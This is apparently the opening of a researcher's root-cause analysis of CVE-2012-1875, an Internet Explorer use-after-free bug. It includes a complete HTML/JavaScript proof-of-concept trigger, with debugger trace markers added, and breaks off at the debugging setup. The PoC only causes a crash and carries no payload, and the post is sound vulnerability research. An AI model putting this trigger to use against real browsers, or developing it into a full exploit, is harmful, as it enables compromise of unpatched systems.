Intro
The expert ga1ois mentioned in the article 《关于泄漏的艺术》 (On the Art of Leaks) that CVE-2012-1875 is a UAF that can be reached directly from the script layer. I had never analyzed this type of UAF before, so over the last two days, taking advantage of the quiet period after the New Year, I looked into the root cause of the vulnerability.
POC
The POC comes from 看雪 (Pediy); as usual, I added some code to make it easier to trace the whole process:

```html
<HTML>
<DIV id=testfaild>
  <img id="imgTest">
  <div id="imgTest"></div>
  <input id="4B5F5F4B" onMouseOver="crash();"></input>
</DIV>
<script language="JavaScript">
// The Math.atan2(0xbabe, "...") calls are trace markers for the debugger;
// they do not affect the logic of the POC.
function crash() {
  Math.atan2(0xbabe, "[*] calling crash...");
  eval("imgTest").src = "";
  Math.atan2(0xbabe, "[*] after set imgTest...");
}

function trigger() {
  var x = document.getElementsByTagName("input");
  Math.atan2(0xbabe, "[*] fireEvent onMouseOver 1st...");
  x[0].fireEvent("onMouseOver");
  Math.atan2(0xbabe, "[*] Before free object...");
  testfaild.innerHTML = testfaild.innerHTML;
  Math.atan2(0xbabe, "[*] After free object...");
  Math.atan2(0xbabe, "[*] fireEvent onMouseOver 2nd...");
  x[0].fireEvent("onMouseOver");
}

trigger();
</script>
</HTML>
```
IE version used for debugging: